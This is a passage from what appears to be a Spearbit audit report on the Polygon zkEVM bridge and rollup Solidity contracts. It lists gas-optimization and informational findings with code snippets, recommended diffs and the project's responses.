        lastMainnetExitRoot = cm = newRoot;
    }
    bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(cm, cr));
    if ( ... ) {
        ...
        emit UpdateGlobalExitRoot(cm, cr);
    }
}

Polygon-Hermez: Solved in PR 82.
Spearbit: Verified.

5.3.4 Optimize _setClaimed()
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L272-L436, PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L587-L605
Description: The functions claimAsset() and claimMessage() first verify !isClaimed() (via the function _verifyLeaf()) and then do _setClaimed(). These two functions can be combined in a more efficient version.

function claimAsset(...) ... {
    _verifyLeaf(...);
    _setClaimed(index);
    ...
}

function claimMessage(...) ... {
    _verifyLeaf(...);
    _setClaimed(index);
    ...
}

function _verifyLeaf(...) ... {
    require(!isClaimed(index), ...);
    ...
}

function isClaimed(uint256 index) public view returns (bool) {
    uint256 claimedWordIndex = index / 256;
    uint256 claimedBitIndex = index % 256;
    uint256 claimedWord = claimedBitMap[claimedWordIndex];
    uint256 mask = (1 << claimedBitIndex);
    return (claimedWord & mask) == mask;
}

function _setClaimed(uint256 index) private {
    uint256 claimedWordIndex = index / 256;
    uint256 claimedBitIndex = index % 256;
    claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex);
}

Recommendation: The following suggestion is based on the Uniswap permit2 bitmap. Replace the duo of isClaimed() and _setClaimed() with the following function _setAndCheckClaimed(). This could be called either inside or outside of _verifyLeaf().

function _setAndCheckClaimed(uint256 index) private {
    (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index);
    uint256 mask = 1 << bitPos;
    uint256 flipped = claimedBitMap[wordPos] ^= mask;
    require(flipped & mask != 0, "PolygonZkEVMBridge::_verifyLeaf: Already claimed");
}

function _bitmapPositions(uint256 index) private pure returns (uint256 wordPos, uint256 bitPos) {
    wordPos = uint248(index >> 8);
    bitPos = uint8(index);
}

Note: update the error message depending on whether it will be called inside or outside of _verifyLeaf(). If the status of the bits has to be retrieved from the outside, add the following function:

function isClaimed(uint256 index) external view returns (bool) {
    (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index);
    uint256 mask = (1 << bitPos);
    return (claimedBitMap[wordPos] & mask) == mask;
}

Polygon-Hermez: Solved in PR 82.
Spearbit: Verified.

5.3.5 SMT branch comparisons can be optimised
Severity: Gas Optimization
Context: DepositContract.sol#L99-L109, DepositContract.sol#L65-L77, DepositContract.sol#L30-L46
Description: When verifying a merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the merkle root. The path is represented by the lower 32 bits of the index variable, where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code:
• Bit shift currentIndex to the right instead of dividing by 2.
• Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line.

function verifyMerkleProof(
    ...
    uint256 currrentIndex = index;
    for (
        uint256 height = 0;
        height < _DEPOSIT_CONTRACT_TREE_DEPTH;
        height++
    ) {
        if ((currrentIndex & 1) == 1)
            node = keccak256(abi.encodePacked(smtProof[height], node));
        else
            node = keccak256(abi.encodePacked(node, smtProof[height]));
        currrentIndex /= 2;
    }

Recommendation: Consider changing the code to:

function verifyMerkleProof(
    ...
-   uint256 currrentIndex = index;
    for (
        uint256 height = 0;
        height < _DEPOSIT_CONTRACT_TREE_DEPTH;
        height++
    ) {
-       if ((currrentIndex & 1) == 1)
+       if (((index >> height) & 1) == 1)
            node = keccak256(abi.encodePacked(smtProof[height], node));
        else
            node = keccak256(abi.encodePacked(node, smtProof[height]));
-       currrentIndex /= 2;
    }

This same optimization can also be applied to similar instances found in _deposit() and getDepositRoot().
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.3.6 Increments can be optimised by pre-fixing variable with ++
Severity: Gas Optimization
Context: DepositContract.sol#L64
Description: There are small gas savings when pre-fixing increments with ++. Sometimes this can be used to combine multiple statements, like in function _deposit().

function _deposit(bytes32 leafHash) internal {
    ...
    depositCount += 1;
    uint256 size = depositCount;
    ...
}

Other occurrences of ++:

PolygonZkEVM.sol:        for (uint256 i = 0; i < batchesNum; i++) {
PolygonZkEVM.sol:        currentLastForceBatchSequenced++;
PolygonZkEVM.sol:        currentBatchSequenced++;
PolygonZkEVM.sol:        lastPendingState++;
PolygonZkEVM.sol:        lastForceBatch++;
PolygonZkEVM.sol:        for (uint256 i = 0; i < batchesNum; i++) {
PolygonZkEVM.sol:        currentLastForceBatchSequenced++;
PolygonZkEVM.sol:        currentBatchSequenced++;
lib/DepositContract.sol: height++
lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) {
lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) {
lib/TokenWrapped.sol:    nonces[owner]++,
verifiers/Verifier.sol:  for (uint i = 0; i < elements; i++) {
verifiers/Verifier.sol:  for (uint i = 0; i < input.length; i++) {
verifiers/Verifier.sol:  for (uint i = 0; i < input.length; i++) {

Recommendation: Consider pre-fixing all variables where ++ is used. Combine statements where possible and where it doesn't reduce readability.

function _deposit(bytes32 leafHash) internal {
    ...
    uint256 size = ++depositCount;
    ...
}

Polygon-Hermez: Solved partially in PR 82. Some exceptions were made where it would make the code less readable or it wouldn't save gas.
Spearbit: Verified.

5.3.7 Move initialization values from initialize() to immutable via constructor
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVMBridge.sol#L69-L77
Description: The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated, they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable to chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge.

contract PolygonZkEVM is ... {
    ...
    uint64 public chainID;
    ...
    function initialize(...) ... {
        ...
        chainID = initializePackedParameters.chainID;
        ...
    }
}

contract PolygonZkEVMBridge is ... {
    ...
    uint32 public networkID;
    ...
    function initialize(uint32 _networkID, ...) ... {
        networkID = _networkID;
        ...
    }
}

Recommendation: Consider making the variables immutable and adding a constructor to initialize them.
Polygon-Hermez: Implemented for PolygonZkEVM in PR 88.
Not implemented for PolygonZkEVMBridge, because it will be deployed with the same address on different chains via CREATE2. In that case it is easier if the initBytecode is the same, and thus it's easier to stay with initialize().
Spearbit: Verified and acknowledged.

5.3.8 Optimize isForceBatchAllowed()
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L393-L399
Description: The modifier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas.

modifier isForceBatchAllowed() {
    require(forceBatchAllowed == true, ...);
    _;
}

Recommendation: Consider changing the code to:

modifier isForceBatchAllowed() {
-   require(forceBatchAllowed == true, ...);
+   require(forceBatchAllowed, ...);
    _;
}

Polygon-Hermez: We decided to erase this modifier. It was intended to be present only on testnet, when forced batches were not yet supported by the node and prover; this won't be necessary anymore. It's a requirement that even the admin won't be able to censor the system.
Spearbit: Verified.

5.3.9 Optimize loop in _updateBatchFee()
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L839-L908
Description: The function _updateBatchFee() uses the following check in a loop: block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget. This is the same as: block.timestamp - veryBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp. As block.timestamp - veryBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    while (currentBatch != currentLastVerifiedBatch) {
        ...
        if (
            block.timestamp - currentSequencedBatchData.sequencedTimestamp >
            veryBatchTimeTarget
        ) {
            ...
        }
    }
}

Recommendation: Consider optimizing the loop by storing the value of block.timestamp - veryBatchTimeTarget in a temporary variable and using that in the comparison.
Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.3.10 Optimize multiplication
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L888
Description: The multiplication in function _updateBatchFee can be optimized to save some gas.
Recommendation: Consider changing the code to:

+unchecked {
-   (10 ** (diffBatches * 3))
+   (1000 ** diffBatches)
+}

Note: the gas saving is only obtained when using unchecked and is very minimal, so double-check it is worth the trouble.
Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.3.11 Changing constant storage variables from public to private will save gas
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L114-L127, PolygonZkEVMBridge.sol#L38-L44, TokenWrapped.sol#L9-L20
Description: Usually constant variables are not expected to be read on-chain and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable, since it auto-generates a getter function which increases deployment cost and sometimes function call cost.
Recommendation: Replace all referenced public constant occurrences with private constant to save gas.
Polygon-Hermez: The public constants of TokenWrapped can be useful for front end implementations or other contracts, as can be seen in the implementation of Uniswap's permit2. The rest of the constants are changed in PR 85.
Spearbit: Verified.
5.3.12 Storage variables not changeable after deployment can be immutable
Severity: Gas Optimization
Context: Mentioned in Recommendation
Description: If a storage variable is not changeable after deployment (set in the constructor), it can be turned into an immutable variable to save gas.
Recommendation:
• PolygonZkEVMGlobalExitRoot.sol#L6-L48

- import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";
- address public bridgeAddress;
- address public rollupAddress;
+ address public immutable bridgeAddress;
+ address public immutable rollupAddress;

- function initialize(address _rollupAddress, address _bridgeAddress) public initializer {
+ constructor(address _rollupAddress, address _bridgeAddress) {
      rollupAddress = _rollupAddress;
      bridgeAddress = _bridgeAddress;
  }

• PolygonZkEVMGlobalExitRootL2.sol#L27

- address public bridgeAddress;
+ address public immutable bridgeAddress;

• PolygonZkEVMTimelock.sol#L14

- PolygonZkEVM public polygonZkEVM;
+ PolygonZkEVM public immutable polygonZkEVM;

• TokenWrapped.sol#L29-L32

- address public bridgeAddress;
+ address public immutable bridgeAddress;
  ...
- uint8 private _decimals;
+ uint8 private immutable _decimals;

Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.3.13 Optimize check in _consolidatePendingState()
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L799-L832
Description: The check in function _consolidatePendingState() can be optimized to save some gas. As lastPendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPendingStateConsolidated makes sure that pendingStateNum > 0. So the explicit check pendingStateNum != 0 isn't necessary.

uint64 public lastPendingStateConsolidated;

function _consolidatePendingState(uint64 pendingStateNum) internal {
    require(
        pendingStateNum != 0 &&
        pendingStateNum > lastPendingStateConsolidated &&
        pendingStateNum <= lastPendingState,
        "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid"
    );
    ...
}

Recommendation: Consider changing the code to:

function _consolidatePendingState(uint64 pendingStateNum) internal {
    require(
-       pendingStateNum != 0 &&
        pendingStateNum > lastPendingStateConsolidated && // pendingStateNum can't be 0
        pendingStateNum <= lastPendingState,
        "PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid"
    );
    ...
}

Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.

5.3.14 Custom errors not used
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L373
Description: Custom errors lead to cheaper deployment and run-time costs.
Recommendation: For a cheaper gas cost, consider using custom errors throughout the whole project.
Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.3.15 Variable can be updated only once instead of on each iteration of a loop
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L495, PolygonZkEVM.sol#L1039
Description: In the functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced variable is increased by 1 on each iteration of the loop, but is not used inside of it. This means that instead of doing batchesNum addition operations, you can do a single one after the loop.
Recommendation: Delete the currentBatchSequenced++; line and just do currentBatchSequenced += batchesNum; right after the loop.
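A sketch of the suggested change, mirroring the report's wording (a uint64 cast may be needed depending on the declared types):

for (uint256 i = 0; i < batchesNum; i++) {
    // ... per-batch processing, no counter update here ...
}
// One addition instead of batchesNum additions
currentBatchSequenced += uint64(batchesNum);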
Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.

5.3.16 Optimize emits in sequenceBatches() and sequenceForceBatches()
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054
Description: The emits in the functions sequenceBatches() and sequenceForceBatches() could be gas optimized by emitting the temporary variables that have just been stored in the global variables, instead of reading the global variables back.

function sequenceBatches(...) ... {
    ...
    lastBatchSequenced = currentBatchSequenced;
    ...
    emit SequenceBatches(lastBatchSequenced);
}

function sequenceForceBatches(...) ... {
    ...
    lastBatchSequenced = currentBatchSequenced;
    ...
    emit SequenceForceBatches(lastBatchSequenced);
}

Recommendation: Consider changing the code to:

function sequenceBatches(...) ... {
    ...
    lastBatchSequenced = currentBatchSequenced;
    ...
-   emit SequenceBatches(lastBatchSequenced);
+   emit SequenceBatches(currentBatchSequenced);
}

function sequenceForceBatches(...) ... {
    ...
    lastBatchSequenced = currentBatchSequenced;
    ...
-   emit SequenceForceBatches(lastBatchSequenced);
+   emit SequenceForceBatches(currentBatchSequenced);
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.3.17 Only update lastForceBatchSequenced if necessary in function sequenceBatches()
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L409-L533
Description: The function sequenceBatches() writes back to lastForceBatchSequenced; however, this is only necessary if there are forced batches. This could be optimized to save some gas, and at the same time the calculation of nonForcedBatchesSequenced could also be optimized.

function sequenceBatches(...) ... {
    ...
    uint64 currentLastForceBatchSequenced = lastForceBatchSequenced;
    ...
    if (currentBatch.minForcedTimestamp > 0) {
        currentLastForceBatchSequenced++;
    ...
    uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced);
    ...
    lastForceBatchSequenced = currentLastForceBatchSequenced;
    ...
}

Recommendation: Consider changing the code to something like the following. Do check if the gas savings are worth the trouble.

function sequenceBatches(...) ... {
    ...
    uint64 currentLastForceBatchSequenced = lastForceBatchSequenced;
+   uint64 orgLastForceBatchSequenced = currentLastForceBatchSequenced;
    ...
    if (currentBatch.minForcedTimestamp > 0) {
        currentLastForceBatchSequenced++;
    ...
-   uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced);
+   uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - orgLastForceBatchSequenced);
    ...
-   lastForceBatchSequenced = currentLastForceBatchSequenced;
+   if (currentLastForceBatchSequenced != orgLastForceBatchSequenced) lastForceBatchSequenced = currentLastForceBatchSequenced;
    ...
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.3.18 Delete forcedBatches[currentLastForceBatchSequenced] after use
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054
Description: The functions sequenceBatches() and sequenceForceBatches() use up the forcedBatches[] entries, after which they are no longer needed. Deleting these values might give a gas refund and lower the L1 gas costs.

function sequenceBatches(...) ... {
    ...
    currentLastForceBatchSequenced++;
    ...
    require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced], ...);
}

function sequenceForceBatches(...) ... {
    ...
    currentLastForceBatchSequenced++;
    ...
    require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced], ...);
    ...
}

Recommendation: Consider deleting the values of forcedBatches[currentLastForceBatchSequenced]. Verify that this indeed saves gas.
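A sketch of the deletion, placed right after the stored hash has been checked (refunds are capped since EIP-3529, hence the advice to verify the actual savings):

require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced], ...);
// The forced batch data is never read again after sequencing;
// zeroing the slot triggers a partial gas refund.
delete forcedBatches[currentLastForceBatchSequenced];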
Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.3.19 Calculate keccak256(currentBatch.transactions) once
Severity: Gas Optimization
Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L972-L1054
Description: Both functions sequenceBatches() and sequenceForceBatches() calculate keccak256(currentBatch.transactions) twice. As currentBatch.transactions could be rather large, calculating its keccak256() could be relatively expensive.

function sequenceBatches(BatchData[] memory batches) ... {
    ...
    if (currentBatch.minForcedTimestamp > 0) {
        ...
        bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ...
        ...
    }
    ...
    currentAccInputHash = ... keccak256(currentBatch.transactions) ...
    ...
}

function sequenceForceBatches(ForcedBatchData[] memory batches) ... {
    ...
    bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ...
    ...
    currentAccInputHash = ... keccak256(currentBatch.transactions) ...
    ...
}

Recommendation: Consider storing the result of keccak256(currentBatch.transactions) in a temporary variable and reusing it later on.
Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.4 Informational

5.4.1 Function definition of onMessageReceived()
Severity: Informational
Context: IBridgeMessageReceiver.sol#L9-L13, PolygonZkEVMBridge.sol#L388-L436
Description: As discovered by the project: the function definition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH, so it should be payable. It is also meant to take action, so it shouldn't be view. The bool return value isn't used in PolygonZkEVMBridge, so it isn't necessary. Because the function is called via a low-level call, this doesn't pose a problem in practice; the current definition is confusing though.

interface IBridgeMessageReceiver {
    function onMessageReceived(...) external view returns (bool);
}

contract PolygonZkEVMBridge is ... {
    function claimMessage(...) ... {
        ...
        (bool success, ) = destinationAddress.call{value: amount}(
            abi.encodeCall(
                IBridgeMessageReceiver.onMessageReceived,
                (originAddress, originNetwork, metadata)
            )
        );
        require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
        ...
    }
}

Recommendation: Change the function definition to the following:

- function onMessageReceived(...) external view returns (bool);
+ function onMessageReceived(...) external payable;

Polygon-Hermez: Solved in PR 89.
Spearbit: Verified.

5.4.2 batchesNum can be explicitly casted in sequenceForceBatches()
Severity: Informational
Context: PolygonZkEVM.sol#L987-L990
Description: The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types: uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64, as Solidity ^0.8.0 checks for overflow/underflow.
Recommendation: Consider explicitly casting batchesNum down to uint64.
Polygon-Hermez: Solved by casting to uint256 in PR 85.
Spearbit: Verified.

5.4.3 Metadata are not migrated on changes in L1 contract
Severity: Informational
Context: PolygonZkEVMBridge.sol#L338-L340
Description: If metadata changes on mainnet (say, a decimals change) after wrapped token creation, the wrapped token's metadata will not change and would keep the older decimals:
1. Token T1 was on mainnet with decimals 18.
2. This was bridged to rollup R1.
3. A wrapped token is created with decimals 18.
4. On mainnet T1's decimals are changed to 6.
5. The wrapped token on R1 still uses 18 decimals.
Recommendation: This behavior needs to be documented, so that users are careful while interacting with the L2 counterpart if any such scenario occurs.
Polygon-Hermez: We consider this to be very unusual behavior, to the point that we are not aware of any token that has changed its metadata (name/symbol/decimals). We could even consider such a token malicious, since changing any of the metadata fields can easily break multiple dapps or trick users. We will add a comment that we cannot support an update of the metadata if the original token updates its own metadata.
Spearbit: Verified.

5.4.4 Remove unused import in PolygonZkEVMGlobalExitRootL2
Severity: Informational
Context: PolygonZkEVMGlobalExitRootL2.sol#L5-L11
Description: The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol; however, this isn't used in the contract.

import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract PolygonZkEVMGlobalExitRootL2 {
}

Recommendation: Remove the unused import in PolygonZkEVMGlobalExitRootL2.

- import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

Polygon-Hermez: Solved in PR 82.
Spearbit: Verified.

5.4.5 Switch from public to external for all non-internally called methods
Severity: Informational
Context: DepositContract.sol#L90, DepositContract.sol#L124, PolygonZkEVMGlobalExitRootL2.sol#L40, PolygonZkEVMGlobalExitRoot.sol#L42, PolygonZkEVMBridge.sol#L69, PolygonZkEVMBridge.sol#L129, PolygonZkEVMBridge.sol#L222, PolygonZkEVMBridge.sol#L272, PolygonZkEVMBridge.sol#L388, PolygonZkEVMBridge.sol#L446, PolygonZkEVMBridge.sol#L480, PolygonZkEVM.sol#L337, PolygonZkEVM.sol#L409, PolygonZkEVM.sol#L545, PolygonZkEVM.sol#L624, PolygonZkEVM.sol#L783, PolygonZkEVM.sol#L920, PolygonZkEVM.sol#L972, PolygonZkEVM.sol#L1064, PolygonZkEVM.sol#L1074, PolygonZkEVM.sol#L1084, PolygonZkEVM.sol#L1097, PolygonZkEVM.sol#L1110, PolygonZkEVM.sol#L1133, PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L1171, PolygonZkEVM.sol#L1182, PolygonZkEVM.sol#L1204, PolygonZkEVM.sol#L1258, Verifier.sol#L320
Description: Functions that are not called from inside of the contract should be external instead of public; this prevents accidentally using a function internally that is meant to be used externally. See also issue "Use calldata instead of memory for function parameters".
Recommendation: Change the function visibility from public to external for the linked methods.
Polygon-Hermez: Solved in PR 85. Note: bridgeAsset() is still public, since it's used in one of the mocks and changing it to external has no effect on bytecode length or gas cost.
Spearbit: Verified.

5.4.6 Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2
Severity: Informational
Context: PolygonZkEVMGlobalExitRoot.sol#L5, PolygonZkEVMGlobalExitRootL2.sol#L11
Description: The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesn't, although they both implement a similar interface. Inheriting from the same interface file would improve the checks by the compiler. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot().

import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";

contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... {
    ...
}

contract PolygonZkEVMGlobalExitRootL2 {
}

Recommendation: Consider having a common interface file, plus an additional interface for the extra function in PolygonZkEVMGlobalExitRoot.
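A minimal sketch of how the interfaces could be split (the interface names and member signatures are illustrative):

// Shared by both the L1 and the L2 contract
interface IBasePolygonZkEVMGlobalExitRoot {
    function updateExitRoot(bytes32 newRoot) external;
    function globalExitRootMap(bytes32 globalExitRoot) external view returns (uint256);
}

// Only implemented by PolygonZkEVMGlobalExitRoot (L1)
interface IPolygonZkEVMGlobalExitRoot is IBasePolygonZkEVMGlobalExitRoot {
    function getLastGlobalExitRoot() external view returns (bytes32);
}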
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.4.7 Abstract the way to calculate GlobalExitRoot
Severity: Informational
Context: PolygonZkEVMGlobalExitRoot.sol#L54-L85, PolygonZkEVMBridge.sol#L520-L581
Description: The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because it will be enhanced when more L2s are added.

contract PolygonZkEVMGlobalExitRoot is ... {
    function updateExitRoot(bytes32 newRoot) external {
        ...
        bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // first
        ...
    }

    function getLastGlobalExitRoot() public view returns (bytes32) {
        return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // second
    }
}

contract PolygonZkEVMBridge is ... {
    function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... {
        ...
        uint256 timestampGlobalExitRoot = globalExitRootManager.globalExitRootMap(
            keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot))
        ); // third
        ...
    }
}

Recommendation: Consider using functions like the ones below:

function calculateGlobalExitRoot(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) {
    return keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot));
}

The following function is useful to prevent having to call globalExitRootManager twice from PolygonZkEVMBridge:

function globalExitRootMapCalculated(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (uint256) {
    return globalExitRootMap[calculateGlobalExitRoot(mainnetExitRoot, rollupExitRoot)];
}

Polygon-Hermez: We created a library to abstract this calculation: GlobalExitRootLib.sol. We didn't put it in PolygonZkEVMGlobalExitRoot, since then it would also have to be put in PolygonZkEVMGlobalExitRootL2, and that contract should be as simple as possible and shouldn't have to be updated when adding new networks. Solved in PR 88.
Spearbit: Verified.

5.4.8 ETH honeypot on L2
Severity: Informational
Context: genesis-gen.json#L9
Description: The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network, according to the documentation. This makes the bridge a large honeypot, even more so than other bridges. If someone were able to retrieve the ETH, they could exchange it for all other available coins on the L2, bridge them back to mainnet, and thus steal about all TVL on the L2.
Recommendation: A possible solution could be:
• Have a cold wallet contract on L2 that contains the bulk of the ETH.
• Have a function that can only transfer ETH to the bridge contract (the bridge contract must be able to receive this).
• A governance action could trigger the ETH transfer to the bridge, making sure there is a sufficiently large amount for any imaginable bridge action.
• Alternatively this action could be permissionless, but that would require implementing time and amount limits, which would complicate the contract.
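A minimal sketch of the escrow idea described in the list above (contract and variable names are hypothetical): the vault holds the bulk of the pre-minted L2 ETH and can forward it only to the bridge.

contract BridgeEthVault {
    address public immutable bridge;      // PolygonZkEVMBridge on L2
    address public immutable governance;  // e.g. the timelock

    constructor(address _bridge, address _governance) {
        bridge = _bridge;
        governance = _governance;
    }

    receive() external payable {}

    // Governance tops up the bridge; the funds can go nowhere else.
    function refillBridge(uint256 amount) external {
        require(msg.sender == governance, "BridgeEthVault: not governance");
        (bool success, ) = bridge.call{value: amount}("");
        require(success, "BridgeEthVault: refill failed");
    }
}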
5.4.9 Allowance is not required to burn wrapped tokens Severity: Informational Context: TokenWrapped.sol#L62-L64 Description: Burning tokens of the deployed TokenWrapped doesn't use up any allowance, because the Bridge has the right to burn the wrapped tokens directly. Normally a user would approve a certain amount of tokens and then perform an action (e.g., bridgeAsset()), which can be seen as an extra safety precaution. That extra safety is lost this way, which might be unexpected from the user's point of view. However, it is also very convenient for doing a one-step bridge (comparable to using permit). Note: most other bridges do it this way as well.

function burn(address account, uint256 value) external onlyBridge {
    _burn(account, value);
}

Recommendation: Document the behavior so users are aware an allowance is not required. Polygon-Hermez: Will be added to the documentation, and a comment is added in PR 88. Spearbit: Verified.

5.4.10 Messages are lost when delivered to EOA by claimMessage() Severity: Informational Context: PolygonZkEVMBridge.sol#L388-L436 Description: The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesn't contain a contract, the low-level call still succeeds and delivers the ETH. The documentation says: "... IBridgeMessageReceiver interface and such interface must be fulfilled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message." As we understood from the project, this behavior is intentional. It can be useful to deliver ETH to externally owned accounts (EOAs); however, the message (which is the main goal of the function) isn't interpreted and is thus lost, without any notification. The loss of message delivery to EOAs (i.e., non-contracts) might not be obvious to casual readers of the code/documentation.

function claimMessage(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(
        abi.encodeCall(
            IBridgeMessageReceiver.onMessageReceived,
            (originAddress, originNetwork, metadata)
        )
    );
    require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
    ...
}

Recommendation: Double-check that this behavior is intended. Add comments about EOAs in the code and clarify them in the documentation. Polygon-Hermez: Solved in PR 88. Spearbit: Verified.

5.4.11 Replace assembly of _getSelector() with Solidity Severity: Informational Context: PolygonZkEVMBridge.sol#L611-L736 Description: The function _getSelector() extracts the first four bytes of a byte array using assembly. This can also be implemented in Solidity, which is easier to read.

function _getSelector(bytes memory _data) private pure returns (bytes4 sig) {
    assembly {
        sig := mload(add(_data, 32))
    }
}

function _permit(..., bytes calldata permitData) ... {
    bytes4 sig = _getSelector(permitData);
    ...
}

Recommendation: Consider using the following way to retrieve the first four bytes, and remove the function _getSelector().

function _permit(..., bytes calldata permitData) ... {
-   bytes4 sig = _getSelector(permitData);
+   bytes4 sig = bytes4(permitData[:4]);

Polygon-Hermez: Solved in PR 82. Spearbit: Verified.

5.4.12 Improvement suggestions for Verifier.sol Severity: Informational Context: Verifier.sol#L14, IVerifierRollup.sol Description: Verifier.sol is a contract automatically generated by snarkjs and is based on the template verifier_groth16.sol.ejs. There are some details of this contract that can be improved.
However, changing it will require doing PRs for the Snarkjs project. Recommendation: We have the following improvement suggestions: • Change to Solidity version 0.8.x, because version 0.6.11 is older and misses overflow/underflow checks. Also, the rest of the PolygonZkEVM codebase uses version 0.8.x. This will also allow using custom errors. • Use uint256 instead of uint, because then it's immediately clear how large the uints are. • Double-check sub(gas(), 2000) in the staticcall()s, as it might not be necessary anymore after the Tangerine Whistle fork, because only 63/64 of the gas is sent. • Generate an explicit interface file like IVerifierRollup.sol and let Verifier.sol inherit it to make sure they are compatible. We also have these suggestions for gas optimizations: • uint q in function negate() could be a constant; • uint256 snark_scalar_field in function verify() could be a constant; • remove switch success case 0 { invalid() }, as it is redundant with the require() after it; • in function pairing(), store the i*6 in a tmp variable; • in function verifyProof(), use return (verify(inputValues, proof) == 0);. Polygon-Hermez: These are great suggestions, but it requires some time to analyze whether these optimizations are completely safe, so we will postpone them to future versions. Spearbit: Acknowledged.

5.4.13 Variable named incorrectly Severity: Informational Context: PolygonZkEVM.sol#L854 Description: It seems the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget, as evidenced by the comment below:

// Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET

Recommendation: Rename the variable veryBatchTimeTarget to verifyBatchTimeTarget. Also, rename the event SetVeryBatchTimeTarget to SetVerifyBatchTimeTarget. If the variable is in fact named correctly, then update the comment instead:

// Check if timestamp is above or below the veryBatchTimeTarget

Polygon-Hermez: Solved in PR 88. Spearbit: Verified.

